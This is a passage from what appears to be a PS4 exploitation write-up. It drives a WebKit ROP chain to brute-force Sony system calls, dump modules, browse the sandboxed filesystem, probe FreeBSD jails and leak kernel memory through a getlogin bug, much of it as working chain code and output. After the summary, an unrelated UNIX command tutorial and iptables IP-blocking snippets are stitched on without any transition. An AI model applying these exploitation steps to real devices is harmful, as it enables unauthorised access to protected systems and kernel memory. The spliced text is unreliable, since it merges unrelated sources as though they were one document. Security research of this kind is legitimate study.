    chain.syscall("Sony system call", Sony + <?php print($_GET["b"]); ?>, 0, 0, 0, 0, 0, 0);
    chain.write_rax_ToVariable(0);

Once the system call has executed, we can check the return value, and if it isn't interesting, redirect the page to the next system call:

    if(chain.getVariable(0) == 0x16) window.location.assign("index.php?b=" + (<?php print($_GET["b"]); ?> + 1).toString());

Running the page with ?b=0 appended to the end will start the brute force from the first Sony system call.
Although this method requires a lot of experimentation, by passing different values to some of the system calls found by brute forcing and analysing the new return values, there are a few system calls which you should be able to partially identify.
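For completeness, here is one way the GET value could be handled in JavaScript alone instead of PHP. This is a sketch under assumptions: readProbeIndex and nextProbeUrl are hypothetical names, and a regular expression is used rather than newer URL APIs because an older WebKit build may not provide them.

```javascript
// Read the numeric "b" parameter from a query string such as "?b=12".
// Returns 0 when the parameter is missing.
function readProbeIndex(search) {
  var match = /[?&]b=(\d+)/.exec(search);
  return match ? parseInt(match[1], 10) : 0;
}

// Build the address of the page that will test the next system call.
function nextProbeUrl(page, search) {
  return page + "?b=" + (readProbeIndex(search) + 1);
}

console.log(readProbeIndex("?b=12"));            // 12
console.log(nextProbeUrl("index.php", "?b=12")); // index.php?b=13
```

In the page itself, readProbeIndex(window.location.search) would take the place of the PHP print when computing the system call number, and nextProbeUrl("index.php", window.location.search) would be passed to window.location.assign.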
System call 538
As an example, I'll take a look at system call 538, without relying on any module dumps.
These are the return values depending on what is passed as the first argument:
    0 - 0x16, "Invalid argument"
    1 - 0xe, "Bad address"
    Pointer to 0s - 0x64 initially, but each time the page is refreshed this value increases by 1

Other potential arguments to try would be PID, thread ID, and file descriptor.
Although most system calls will return 0 on success, the fact that the return value increases each time it is called suggests that it is allocating a resource number, such as a file descriptor.
The next thing to do would be to look at the data before and after performing the system call, to see if it has been written to.
Since there is no change in the data, we can assume that it is an input for now.
I then tried passing a long string as the first argument. You should always try this with every input you find because there is the possibility of discovering a buffer overflow.
    writeString(chain.data, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);

The return value for this is 0x3f, ENAMETOOLONG. Unfortunately it seems that this system call correctly limits the name (32 bytes including the NULL terminator), but it does tell us that it is expecting a string, rather than a struct.
We now have a few possibilities for what this system call is doing, the most obvious being something related to the filesystem (such as a custom mkdir or open), but this doesn't seem particularly likely seeing as a resource was allocated even before we wrote any data to the pointer.
To test whether the first parameter is a path, we can break it up with multiple / characters to see if this allows for a longer string:
    writeString(chain.data, "aaaaaaaaaa/aaaaaaaaaa/aaaaaaaaaa");
    chain.syscall("unknown", 538, chain.data, 0, 0, 0, 0, 0);

Since this also returns 0x3f, we can assume that the first argument isn't a path; it is a name for something that gets allocated a sequential identifier.
After analysing some more system calls, I found that the following all shared this exact same behaviour:
    533
    538
    557
    574
    580

From the information that we have so far, it is almost impossible to pinpoint exactly what these system calls do, but as you run more tests, further information will slowly be revealed.
To save you some time, system call 538 is allocating an event flag (and it doesn't just take a name).
Using general knowledge of how a kernel works, you can guess, and then verify, what the system calls are allocating (semaphores, mutexes, etc).
Dumping additional modules
We can dump additional modules by following these stages:
- Load the module
- Get the module's base address
- Dump the module
I've extracted and posted a list of all module names on psdevwiki.
To load a module we will need to use the sceSysmoduleLoadModule function from libSceSysmodule.sprx + 0x1850. The first parameter is the module ID to load, and the other 3 should just be passed 0.
The following JuSt-ROP method can be used to perform a function call:
    this.call = function(name, module, address, arg1, arg2, arg3, arg4, arg5, arg6) {
        console.log("call " + name);

        if(typeof(arg1) !== "undefined") this.add("pop rdi", arg1);
        if(typeof(arg2) !== "undefined") this.add("pop rsi", arg2);
        if(typeof(arg3) !== "undefined") this.add("pop rdx", arg3);
        if(typeof(arg4) !== "undefined") this.add("pop rcx", arg4);
        if(typeof(arg5) !== "undefined") this.add("pop r8", arg5);
        if(typeof(arg6) !== "undefined") this.add("pop r9", arg6);
        this.add(module_bases[module] + address);
    }

So, to load libSceAvSetting.sprx (0xb):

    chain.call("sceSysmoduleLoadModule", libSysmodule, 0x1850, 0xb, 0, 0, 0);

Unfortunately, a segmentation fault will be triggered when trying to load certain modules; this is because the sceSysmoduleLoadModule function doesn't load dependencies, so you will need to manually load them first.
Like most system calls, this should return 0 on success. To see the loaded module ID that was allocated, we can use one of Sony's custom system calls, number 592, to get a list of currently loaded modules:
    var countAddress = chain.data;
    var modulesAddress = chain.data + 8;

    // System call 592, getLoadedModules(int *destinationModuleHandles, int max, int *count);
    chain.syscall("getLoadedModules", 592, modulesAddress, 256, countAddress);

    chain.execute(function() {
        var count = getU64from(countAddress);
        for(var index = 0; index < count; index++) {
            logAdd("Module handle: 0x" + getU32from(modulesAddress + index * 4).toString(16));
        }
    });

Running this without loading any additional modules will produce the following list:

    0x0, 0x1, 0x2, 0xc, 0xe, 0xf, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1e, 0x37, 0x59

But if we run it after loading module 0xb, we will see an additional entry, 0x65. Remember that a module ID is not the same as a loaded module handle.
We can now use another of Sony's custom system calls, number 593, which takes a module handle and a buffer, and fills the buffer with information about the loaded module, including its base address. Since the next available handle is always 0x65, we can hardcode this value into our chain, rather than having to store the result from the module list.
The buffer must start with the size of the struct that should be returned, otherwise error 0x16 will be returned, "Invalid argument":
setU64to(moduleInfoAddress, 0x160);
chain.syscall("getModuleInfo", 593, 0x65, moduleInfoAddress);
chain.execute(function() {
    logAdd(hexDump(moduleInfoAddress, 0x160));
});
It will return 0 upon success, and fill the buffer with a struct which can be read like so:
var name = readString(moduleInfoAddress + 0x8);
var codeBase = getU64from(moduleInfoAddress + 0x108);
var codeSize = getU32from(moduleInfoAddress + 0x110);
var dataBase = getU64from(moduleInfoAddress + 0x118);
var dataSize = getU32from(moduleInfoAddress + 0x120);
We now have everything we need to dump the module!
dump(codeBase, codeSize + dataSize);
There is another Sony system call, number 608, which works in a similar way to 593, but provides slightly different information about the loaded module:
setU64to(moduleInfoAddress, 0x1a8);
chain.syscall("getDifferentModuleInfo", 608, 0x65, 0, moduleInfoAddress);
logAdd(hexDump(moduleInfoAddress, 0x1a8));
It's not clear what this information is.
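To make the layout of the struct returned by system call 593 easier to follow, here is a rough offline sketch that parses the same offsets out of a byte buffer. parseModuleInfo is a hypothetical helper, the sample values (module name, addresses and sizes) are invented purely for illustration, and treating the name field as running from 0x8 up to 0x108 is my assumption based on where the next field starts.

```javascript
// parseModuleInfo is a hypothetical helper; the offsets are the ones used in the text.
function parseModuleInfo(bytes) {
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  // Assumption: the name is a NUL-terminated string between 0x8 and 0x108.
  let end = 0x8;
  while (end < 0x108 && bytes[end] !== 0) end++;
  const name = String.fromCharCode(...bytes.subarray(0x8, end));
  return {
    structSize: view.getBigUint64(0x0, true),   // size we wrote before the call
    name,
    codeBase: view.getBigUint64(0x108, true),
    codeSize: view.getUint32(0x110, true),
    dataBase: view.getBigUint64(0x118, true),
    dataSize: view.getUint32(0x120, true),
  };
}

// Invented sample buffer, only so that the sketch can run on its own.
const sample = new Uint8Array(0x160);
const sampleView = new DataView(sample.buffer);
sampleView.setBigUint64(0x0, 0x160n, true);
"libExample.sprx".split("").forEach((ch, i) => { sample[0x8 + i] = ch.charCodeAt(0); });
sampleView.setBigUint64(0x108, 0x800000000n, true);
sampleView.setUint32(0x110, 0x4000, true);
sampleView.setBigUint64(0x118, 0x800004000n, true);
sampleView.setUint32(0x120, 0x1000, true);

const info = parseModuleInfo(sample);
console.log(info.name, "0x" + info.codeBase.toString(16), info.codeSize + info.dataSize);
```

The 64-bit fields are read as BigInt values so that full addresses survive without losing precision.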
Browsing the filesystem
The PS4 uses the standard FreeBSD 9.0 system calls for reading files and directories.
However, whilst using read for some directories such as /dev/ will work, others, such as / will fail.
I'm not sure why this is, but if we use getdents instead of read for directories, it will work much more reliably:
writeString(chain.data, "/dev/");
chain.syscall("open", 5, chain.data, 0, 0);
chain.write_rax_ToVariable(0);
chain.read_rdi_FromVariable(0);
chain.syscall("getdents", 272, undefined, chain.data + 0x10, 1028);
This is the resultant memory:
0000010: 0700 0000 1000 0205 6469 7073 7700 0000 ........dipsw...
0000020: 0800 0000 1000 0204 6e75 6c6c 0000 0000 ........null....
0000030: 0900 0000 1000 0204 7a65 726f 0000 0000 ........zero....
0000040: 0301 0000 0c00 0402 6664 0000 0b00 0000 ........fd......
0000050: 1000 0a05 7374 6469 6e00 0000 0d00 0000 ....stdin.......
0000060: 1000 0a06 7374 646f 7574 0000 0f00 0000 ....stdout......
0000070: 1000 0a06 7374 6465 7272 0000 1000 0000 ....stderr......
0000080: 1000 0205 646d 656d 3000 0000 1100 0000 ....dmem0.......
0000090: 1000 0205 646d 656d 3100 0000 1300 0000 ....dmem1.......
00000a0: 1000 0206 7261 6e64 6f6d 0000 1400 0000 ....random......
00000b0: 1000 0a07 7572 616e 646f 6d00 1600 0000 ....urandom.....
00000c0: 1400 020b 6465 6369 5f73 7464 6f75 7400 ....deci_stdout.
00000d0: 1700 0000 1400 020b 6465 6369 5f73 7464 ........deci_std
00000e0: 6572 7200 1800 0000 1400 0209 6465 6369 err.........deci
00000f0: 5f74 7479 3200 0000 1900 0000 1400 0209 _tty2...........
0000100: 6465 6369 5f74 7479 3300 0000 1a00 0000 deci_tty3.......
0000110: 1400 0209 6465 6369 5f74 7479 3400 0000 ....deci_tty4...
0000120: 1b00 0000 1400 0209 6465 6369 5f74 7479 ........deci_tty
0000130: 3500 0000 1c00 0000 1400 0209 6465 6369 5...........deci
0000140: 5f74 7479 3600 0000 1d00 0000 1400 0209 _tty6...........
0000150: 6465 6369 5f74 7479 3700 0000 1e00 0000 deci_tty7.......
0000160: 1400 020a 6465 6369 5f74 7479 6130 0000 ....deci_ttya0..
0000170: 1f00 0000 1400 020a 6465 6369 5f74 7479 ........deci_tty
0000180: 6230 0000 2000 0000 1400 020a 6465 6369 b0.. .......deci
0000190: 5f74 7479 6330 0000 2200 0000 1400 020a _ttyc0..".......
00001a0: 6465 6369 5f73 7464 696e 0000 2300 0000 deci_stdin..#...
00001b0: 0c00 0203 6270 6600 2400 0000 1000 0a04 ....bpf.$.......
00001c0: 6270 6630 0000 0000 2900 0000 0c00 0203 bpf0....).......
00001d0: 6869 6400 2c00 0000 1400 0208 7363 655f hid.,.......sce_
00001e0: 7a6c 6962 0000 0000 2e00 0000 1000 0204 zlib............
00001f0: 6374 7479 0000 0000 3400 0000 0c00 0202 ctty....4.......
0000200: 6763 0000 3900 0000 0c00 0203 6463 6500 gc..9.......dce.
0000210: 3a00 0000 1000 0205 6462 6767 6300 0000 :.......dbggc...
0000220: 3e00 0000 0c00 0203 616a 6d00 4100 0000 >.......ajm.A...
0000230: 0c00 0203 7576 6400 4200 0000 0c00 0203 ....uvd.B.......
0000240: 7663 6500 4500 0000 1800 020d 6e6f 7469 vce.E.......noti
0000250: 6669 6361 7469 6f6e 3000 0000 4600 0000 fication0...F...
0000260: 1800 020d 6e6f 7469 6669 6361 7469 6f6e ....notification
0000270: 3100 0000 5000 0000 1000 0206 7573 6263 1...P.......usbc
0000280: 746c 0000 5600 0000 1000 0206 6361 6d65 tl..V.......came
0000290: 7261 0000 8500 0000 0c00 0203 726e 6700 ra..........rng.
00002a0: 0701 0000 0c00 0403 7573 6200 c900 0000 ........usb.....
00002b0: 1000 0a07 7567 656e 302e 3400 0000 0000 ....ugen0.4.....
00002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
You can read some of these devices, for example: reading /dev/urandom will fill the memory with random data.
It is also possible to parse this memory to create a clean list of entries; look at browser.html in the repository for a complete file browser.
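As a rough idea of what that parsing involves, the sketch below walks a getdents buffer record by record. It assumes the FreeBSD 9 struct dirent layout (32-bit d_fileno, 16-bit d_reclen, 8-bit d_type, 8-bit d_namlen, then the name), which matches the dump above. parseDirents is a hypothetical helper and is not taken from browser.html; the sample bytes are the first four records of the /dev/ listing.

```javascript
// Hypothetical helper: walk a buffer filled by getdents and list the entries.
function parseDirents(bytes) {
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  const entries = [];
  let offset = 0;
  while (offset + 8 <= bytes.length) {
    const fileno = view.getUint32(offset, true);     // d_fileno
    const reclen = view.getUint16(offset + 4, true); // d_reclen, size of this record
    const type = bytes[offset + 6];                  // d_type (2 = DT_CHR, 4 = DT_DIR, 10 = DT_LNK)
    const namlen = bytes[offset + 7];                // d_namlen
    if (reclen === 0) break;                         // zero padding: no more records
    const name = String.fromCharCode(...bytes.subarray(offset + 8, offset + 8 + namlen));
    entries.push({ fileno, type, name });
    offset += reclen;                                // jump to the next record
  }
  return entries;
}

// First four records of the /dev/ dump above.
const dump = Uint8Array.from([
  0x07, 0x00, 0x00, 0x00, 0x10, 0x00, 0x02, 0x05, 0x64, 0x69, 0x70, 0x73, 0x77, 0x00, 0x00, 0x00, // dipsw
  0x08, 0x00, 0x00, 0x00, 0x10, 0x00, 0x02, 0x04, 0x6e, 0x75, 0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, // null
  0x09, 0x00, 0x00, 0x00, 0x10, 0x00, 0x02, 0x04, 0x7a, 0x65, 0x72, 0x6f, 0x00, 0x00, 0x00, 0x00, // zero
  0x03, 0x01, 0x00, 0x00, 0x0c, 0x00, 0x04, 0x02, 0x66, 0x64, 0x00, 0x00,                         // fd
]);

const entries = parseDirents(dump);
console.log(entries.map((entry) => entry.name).join(" "));
```

Advancing by d_reclen rather than by the name length matters, because each record is padded to a 4 byte boundary.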
Unfortunately, due to sandboxing we don't have complete access to the file system. Trying to read files and directories that do exist but are restricted will give you error 2, ENOENT, "No such file or directory".
We do have access to a lot of interesting stuff though, including encrypted save data, trophies, and account information. I will go over more of the filesystem in my next article.
Sandboxing
As well as file related system calls failing for certain paths, there are other reasons for a system call to fail.
Most commonly, a disallowed system call, such as ptrace, will just return error 1, EPERM, "Operation not permitted"; but other system calls may fail for different reasons:
Compatibility system calls are disabled. If you are trying to call mmap for example, you must use system call number 477, not 71 or 197; otherwise a segfault will be triggered.
Other system calls such as exit will also trigger a segmentation fault:
chain.syscall("exit", 1, 0);
Trying to create an SCTP socket will return error 0x2b, EPROTONOSUPPORT, indicating that SCTP sockets have been disabled in the PS4 kernel:
//int socket(int domain, int type, int protocol);
//socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
chain.syscall("socket", 97, 2, 1, 132);
And although calling mmap with PROT_READ | PROT_WRITE | PROT_EXEC will return a valid pointer, the PROT_EXEC flag is ignored. Reading its protection will return 3 (RW), and any attempt to execute the memory will trigger a segfault:
chain.syscall("mmap", 477, 0, 4096, 1 | 2 | 4, 4096, -1, 0);
chain.write_rax_ToVariable(0);
chain.read_rdi_FromVariable(0);
chain.add("pop rax", 0xfeeb);
chain.add("mov [rdi], rax");
chain.add("mov rax, rdi");
chain.add("jmp rax");
The list of open source software used in the PS4 doesn't list any kind of sandboxing software like Capsicum, so the PS4 must use either pure FreeBSD jails, or some kind of custom, proprietary, sandboxing system (unlikely).
Jails
We can prove the existence of FreeBSD jails being actively used in the PS4's kernel through the auditon system call being impossible to execute within a jailed environment:
chain.syscall("auditon", 446, 0, 0, 0);
The first thing the auditon system call does is check whether the caller is jailed, and if so, return ENOSYS:
if (jailed(td->td_ucred))
    return (ENOSYS);
Otherwise the system call would most likely return EPERM from mac_system_check_auditon:
error = mac_system_check_auditon(td->td_ucred, uap->cmd);
if (error)
    return (error);
Or from priv_check:
error = priv_check(td, PRIV_AUDIT_CONTROL);
if (error)
    return (error);
The absolute furthest that the system call could reach would be immediately after the priv_check, before returning EINVAL due to the length argument being 0:
if ((uap->length <= 0) || (uap->length > sizeof(union auditon_udata)))
    return (EINVAL);
Since mac_system_check_auditon and priv_check will never return ENOSYS, having the jailed check pass is the only way ENOSYS could be returned.
When executing the chain, ENOSYS is returned (0x48).
This tells us that whatever sandbox system the PS4 uses is at least based on jails because the jailed check passes.
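The reasoning can be summarised with a small model of those early checks. This is just my own sketch in JavaScript, not kernel code: auditonOutcome is a hypothetical function, the errors are plain strings rather than real errno values, and maxLength is a stand-in for sizeof(union auditon_udata), whose real size I have not checked.

```javascript
// Hypothetical model of the early checks in auditon, in the order quoted above.
function auditonOutcome({ jailed, macError, privError, length, maxLength }) {
  if (jailed) return "ENOSYS";                   // jailed(td->td_ucred)
  if (macError) return macError;                 // mac_system_check_auditon
  if (privError) return privError;               // priv_check
  if (length <= 0 || length > maxLength) return "EINVAL";
  return "continues";                            // the rest of the call would run
}

// maxLength = 64 is an arbitrary placeholder, not the real union size.
const cases = [
  { jailed: true,  macError: null,    privError: null,    length: 0, maxLength: 64 },
  { jailed: false, macError: "EPERM", privError: null,    length: 0, maxLength: 64 },
  { jailed: false, macError: null,    privError: "EPERM", length: 0, maxLength: 64 },
  { jailed: false, macError: null,    privError: null,    length: 0, maxLength: 64 },
];

const outcomes = cases.map(auditonOutcome);
console.log(outcomes.join(", "));
```

With a length argument of 0, as in our chain, only the jailed case produces ENOSYS; every other path ends in EPERM or EINVAL.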
FreeBSD 9.0 kernel exploits
It makes little sense to look for new vulnerabilities in the FreeBSD 9.0 kernel source code: since its release in 2012, several kernel exploits have already been found, which the PS4 could potentially be vulnerable to.
We can immediately dismiss some of these for obvious reasons:
FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit - this won't work since, as previously stated, we don't have access to the ptrace system call.
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit - won't work because the PS4 uses an AMD processor.
FreeBSD Kernel - Multiple Vulnerabilities - maybe the first vulnerability will lead to something, but the other 2 rely on SCTP sockets, which the PS4 kernel has disabled (as previously stated).
However, there are some smaller vulnerabilities, which could lead to something:
getlogin
One vulnerability which looks easy to try is using the getlogin system call to leak a small amount of kernel memory.
The getlogin system call is intended to copy the login name of the current session to userland memory. However, due to a bug, the whole buffer is always copied, and not just the size of the name string. This means that we can read some uninitialised data from the kernel, which might be of some use.
Note that the system call (49) is actually int getlogin_r(char *name, int len); and not char *getlogin(void);.
So, let's try copying some kernel memory into an unused part of userland memory:
chain.syscall("getlogin", 49, chain.data, 17);
Unfortunately 17 bytes is the most data we can get, since:
Login names are limited to MAXLOGNAME (from <sys/param.h>) characters, currently 17 including null. - FreeBSD Man Pages
After executing the chain, the return value was 0, which means that the system call worked! An excellent start. Now let's take a look at the memory which we pointed to:
Before executing the chain:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
After executing the chain:
72 6f 6f 74 00 fe ff ff 08 62 61 82 ff ff ff ff 00
After decoding the first 4 bytes as ASCII:
root
So the browser is executed as root! That was unexpected.
But more interestingly, the memory leaked looks like a pointer to something in the kernel, which is always the same each time the chain is run; this is evidence to support Yifanlu's claims that the PS4 has no Kernel ASLR!
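To see why the leaked bytes look like a kernel pointer, they can be decoded offline. The sketch below takes the 17 bytes shown above, reads the name up to the first NUL, and then treats the 8 bytes at offset 8 as a little-endian 64-bit value. That last step is my interpretation of the data; nothing confirms that the kernel stores a pointer at exactly that offset.

```javascript
// The 17 bytes returned by getlogin, copied from the dump above.
const leaked = Uint8Array.from([
  0x72, 0x6f, 0x6f, 0x74, 0x00, 0xfe, 0xff, 0xff,
  0x08, 0x62, 0x61, 0x82, 0xff, 0xff, 0xff, 0xff, 0x00,
]);

// The login name ends at the first NUL byte.
const nameEnd = leaked.indexOf(0);
const name = String.fromCharCode(...leaked.subarray(0, nameEnd));

// Assumption: bytes 8 to 15 form one little-endian 64-bit value.
const view = new DataView(leaked.buffer);
const pointer = view.getBigUint64(8, true);

console.log(name);                         // root
console.log("0x" + pointer.toString(16));  // 0xffffffff82616208
```

The upper 32 bits being all ones is what you would expect from an address in the kernel half of the x86-64 address space, and the three bytes fe ff ff after the name look like the tail of another such value.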
Summary
From the information currently available, the PS4's kernel seems to be very similar to the stock FreeBSD 9.0 kernel.
Importantly, the differences that are present appear to be from standard kernel configuration changes (such as disabling SCTP sockets), rather than from modified code. Sony have also added several of their own custom system calls to the kernel, but apart from this, the rest of the kernel seems fairly untouched.
In this respect, I'm inclined to believe that the PS4 shares most of the same juicy vulnerabilities as FreeBSD 9.0's kernel!
Unfortunately, most kernel exploits cannot be triggered from the WebKit entry point that we currently have due to sandboxing constraints (likely to be just stock FreeBSD jails).
And with FreeBSD 10 being out, it's unlikely that anyone is stashing away any private exploits for FreeBSD 9, so unless a new one is suddenly released, we're stuck with what is currently available.
It may not be impossible to exploit the PS4 kernel by leveraging some of the existing kernel memory corruption vulnerabilities, but it certainly wouldn't be easy.
The best approach from here seems to be reverse engineering all of the modules which can be dumped, in order to document as many of Sony's custom system calls as possible; I have a hunch that we will have more luck targeting these, than the standard FreeBSD system calls.
Recently Jaicrab has discovered two UART ports on the PS4 which shows us that there are hardware hackers interested in the PS4. Although the role of hardware hackers has traditionally been to dump the RAM of a system, like with the DSi, which we can already do thanks to the WebKit exploit, there's also the possibility of a hardware triggered kernel vulnerability being found, like geohot's original PS3 hypervisor hack. It remains most likely that a kernel exploit will be found on the PS4 through system call vulnerabilities though.
Linux Command Line
ls              list files and directories
ls -a           list all files and directories
mkdir           make a directory
cd directory    change to named directory
cd              change to home-directory
cd ~            change to home-directory
cd ..           change to parent directory
pwd             display the path of the current directory
cp (copy)
cp file1 file2 is the command which makes a copy of file1 in the current working directory and calls it file2
What we are going to do now, is to take a file stored in an open access area of the file system, and use the cp command to copy it to your unixstuff directory.
First, cd to your unixstuff directory.
% cd ~/unixstuff
Then at the UNIX prompt, type,
% cp /vol/examples/tutorial/science.txt .
Note: Don't forget the dot . at the end. Remember, in UNIX, the dot means the current directory.
The above command means copy the file science.txt to the current directory, keeping the name the same.
(Note: The directory /vol/examples/tutorial/ is an area to which everyone in the school has read and copy access. If you are from outside the University, you can grab a copy of the file here. Use 'File/Save As..' from the menu bar to save it into your unixstuff directory.)
Exercise 2a
Create a backup of your science.txt file by copying it to a file called science.bak
2.2 Moving files
mv (move)
mv file1 file2 moves (or renames) file1 to file2
To move a file from one place to another, use the mv command. This has the effect of moving rather than copying the file, so you end up with only one file rather than two.
It can also be used to rename a file, by moving the file to the same directory, but giving it a different name.
We are now going to move the file science.bak to your backup directory.
First, change directories to your unixstuff directory (can you remember how?). Then, inside the unixstuff directory, type
% mv science.bak backups/.
Type ls and ls backups to see if it has worked.
2.3 Removing files and directories
rm (remove), rmdir (remove directory)
To delete (remove) a file, use the rm command. As an example, we are going to create a copy of the science.txt file then delete it.
Inside your unixstuff directory, type
% cp science.txt tempfile.txt
% ls
% rm tempfile.txt
% ls
You can use the rmdir command to remove a directory (make sure it is empty first). Try to remove the backups directory. You will not be able to since UNIX will not let you remove a non-empty directory.
Exercise 2b
Create a directory called tempstuff using mkdir , then remove it using the rmdir command.
2.4 Displaying the contents of a file on the screen
clear (clear screen)
Before you start the next section, you may like to clear the terminal window of the previous commands so the output of the following commands can be clearly understood.
At the prompt, type
% clear
This will clear all text and leave you with the % prompt at the top of the window.
cat (concatenate)
The command cat can be used to display the contents of a file on the screen. Type:
% cat science.txt
As you can see, the file is longer than the size of the window, so it scrolls past, making it unreadable.
less
The command less writes the contents of a file onto the screen a page at a time. Type
% less science.txt
Press the [space-bar] if you want to see another page, and type [q] if you want to quit reading. As you can see, less is used in preference to cat for long files.
head
The head command writes the first ten lines of a file to the screen.
First clear the screen then type
% head science.txt
Then type
% head -5 science.txt
What difference did the -5 make to the head command?
tail
The tail command writes the last ten lines of a file to the screen.
Clear the screen and type
% tail science.txt
Q. How can you view the last 15 lines of the file?
2.5 Searching the contents of a file
Simple searching using less
Using less, you can search through a text file for a keyword (pattern). For example, to search through science.txt for the word 'science', type
% less science.txt
then, still in less, type a forward slash [/] followed by the word to search
/science
As you can see, less finds and highlights the keyword. Type [n] to search for the next occurrence of the word.
grep (don't ask why it is called grep)
grep is one of many standard UNIX utilities. It searches files for specified words or patterns. First clear the screen, then type
% grep science science.txt
As you can see, grep has printed out each line containing the word science.
Or has it ????
Try typing
% grep Science science.txt
The grep command is case sensitive; it distinguishes between Science and science.
To ignore upper/lower case distinctions, use the -i option, i.e. type
% grep -i science science.txt
To search for a phrase or pattern, you must enclose it in single quotes (the apostrophe symbol). For example to search for spinning top, type
% grep -i 'spinning top' science.txt
Some of the other options of grep are:
-v display those lines that do NOT match
-n precede each matching line with the line number
-c print only the total count of matched lines
Try some of them and see the different results. Don't forget, you can use more than one option at a time. For example, the number of lines without the words science or Science is
% grep -ivc science science.txt
wc (word count)
A handy little utility is the wc command, short for word count. To do a word count on science.txt, type
% wc -w science.txt
To find out how many lines the file has, type
% wc -l science.txt
SSH
iptables -I INPUT -s 1.2.3.4 -j DROP
or you can use append
iptables -A INPUT -s 1.2.3.4 -j DROP
How Do I Block Subnet (xx.yy.zz.ww/ss)?
Use the following syntax to block 10.0.0.0/8 on eth1 public interface:
iptables -i eth1 -A INPUT -s 10.0.0.0/8 -j DROP
How Do I View Blocked IP Address?
Simply use the following command:
iptables -L -v
How Do I Save Blocked IP Address?
service iptables save
How Do I Unblock An IP Address?
Use the following syntax (the -D option deletes the rule from the table):
- iptables -D INPUT -s xx.xxx.xx.xx -j DROP
- iptables -D INPUT -s 65.55.44.100 -j DROP
- service iptables save